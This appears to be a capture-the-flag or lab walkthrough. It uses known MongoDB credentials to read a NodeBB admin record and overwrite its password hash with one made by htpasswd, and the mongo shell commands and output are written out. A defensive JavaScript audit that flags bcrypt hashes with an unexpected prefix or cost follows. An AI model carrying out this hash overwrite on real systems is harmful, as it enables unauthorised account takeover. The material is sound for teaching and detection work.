Authenticated MongoDB

With valid credentials we can overwrite databases and change passwords and configuration for other services in the environment. For example, this could mean generating a new htpasswd hash for WebDAV or NodeBB.

┌──(kali㉿kali)-[~]
└─$ mongo mongodb://admin:monkey13@192.168.120.186:27017/
MongoDB shell version v4.2.13
connecting to: mongodb://192.168.120.186:27017/?compressors=disabled&gssapiServiceName=mongodb
Implicit session: session { "id" : UUID("42164b37-99dd-429d-91fc-65cc46e0240a") }
MongoDB server version: 4.0.22
...
---

> show databases
admin   0.000GB
config  0.000GB
local   0.000GB
nodebb  0.000GB
>
> use nodebb
switched to db nodebb
> db.objects.find({ _key: /^user:1$/ })
{ "_id" : ObjectId("6017626e253f4a61ea72a355"), "_key" : "user:1", "email" : "admin@tico.offsec", "joindate" : 1612145262550, "lastonline" : 1612146689780, "status" : "online", "uid" : 1, "username" : "admin", "userslug" : "admin", "password" : "$2a$12$T3BIimnZgfw60c12wFA99.MbugSdE0hfl/SSCYFZJ7jTVHe5PGGB6", "groupTitle" : "[\"administrators\"]", "topiccount" : 1, "postcount" : 1, "lastposttime" : 1612145263314 }

We see a single record in the collection, which belongs to the default admin user. We need to generate a new salted password hash to replace the password field in the record. We can do that with the htpasswd utility by generating a new bcrypt hash of the password "password".

┌──(kali㉿kali)-[~]
└─$ htpasswd -bnBC 12 "" password            
:$2y$12$6.8Es6W3Cyc0en31K4inBef3mCoJaDo2lJ6biXdUmKXfrsSqlfgsW

Before using it, however, we first need to strip off the leading :.

┌──(kali㉿kali)-[~]
└─$ htpasswd -bnBC 12 "" password | tr -d ':'
$2y$12$LMqnkbq1FpTnOzAWTgizbugAOpGJaKl0h7PVHvDraW9e0wK2SR7Zu

Next, we'll overwrite the target password field with our newly generated hash.

> db.objects.update({ _key: /^user:1$/ }, { $set: { password: "$2y$12$LMqnkbq1FpTnOzAWTgizbugAOpGJaKl0h7PVHvDraW9e0wK2SR7Zu" }})
WriteResult({ "nMatched" : 1, "nUpserted" : 0, "nModified" : 1 })
> exit
bye

┌──(kali㉿kali)-[~]
└─$
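
From the defender's side, the overwrite above leaves a trace: the replacement hash carries htpasswd's $2y$ prefix, while the original admin record used $2a$. The following added example (not part of the original page) audits NodeBB user documents for that mismatch. The expected variant and cost are assumptions taken from the original admin record shown earlier, and the keys user:2 and user:3 and the truncated hash are constructed.

```javascript
// Added example (not from the original page). Flags NodeBB user objects whose
// password hash does not look like one the application itself would write.
const BCRYPT_RE = /^\$(2[abxy]?)\$(\d{2})\$([./A-Za-z0-9]{53})$/;

// Assumption: the application writes "$2a$" hashes at cost 12, as in the
// original admin record in the session above. Adjust per deployment.
const EXPECTED = { variants: ["2a"], cost: 12 };

function auditUserHashes(docs, expected = EXPECTED) {
  const findings = [];
  for (const doc of docs) {
    if (!/^user:\d+$/.test(String(doc._key))) continue; // user objects only
    const hash = typeof doc.password === "string" ? doc.password : "";
    const m = BCRYPT_RE.exec(hash);
    let reason = null;
    if (!m) {
      reason = "missing or malformed bcrypt hash";
    } else if (!expected.variants.includes(m[1])) {
      reason = "unexpected variant $" + m[1] + "$"; // e.g. written by htpasswd
    } else if (Number(m[2]) !== expected.cost) {
      reason = "unexpected cost " + m[2];
    }
    if (reason) findings.push({ key: doc._key, reason });
  }
  return findings;
}

// Sample documents: the two full hashes are the ones shown in the session
// above; keys user:2 and user:3 and the truncated hash are constructed.
const SAMPLE = [
  { _key: "user:1",
    password: "$2a$12$T3BIimnZgfw60c12wFA99.MbugSdE0hfl/SSCYFZJ7jTVHe5PGGB6" },
  { _key: "user:2",
    password: "$2y$12$LMqnkbq1FpTnOzAWTgizbugAOpGJaKl0h7PVHvDraW9e0wK2SR7Zu" },
  { _key: "user:3", password: "$2a$12$tooshort" },
  { _key: "user:1:settings" }, // not a user object, skipped
];

console.log(auditUserHashes(SAMPLE));
```

In a real audit the documents would come from a read-only query such as `db.objects.find({ _key: /^user:\d+$/ })`, run on a schedule so that a changed prefix or cost shows up between runs.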
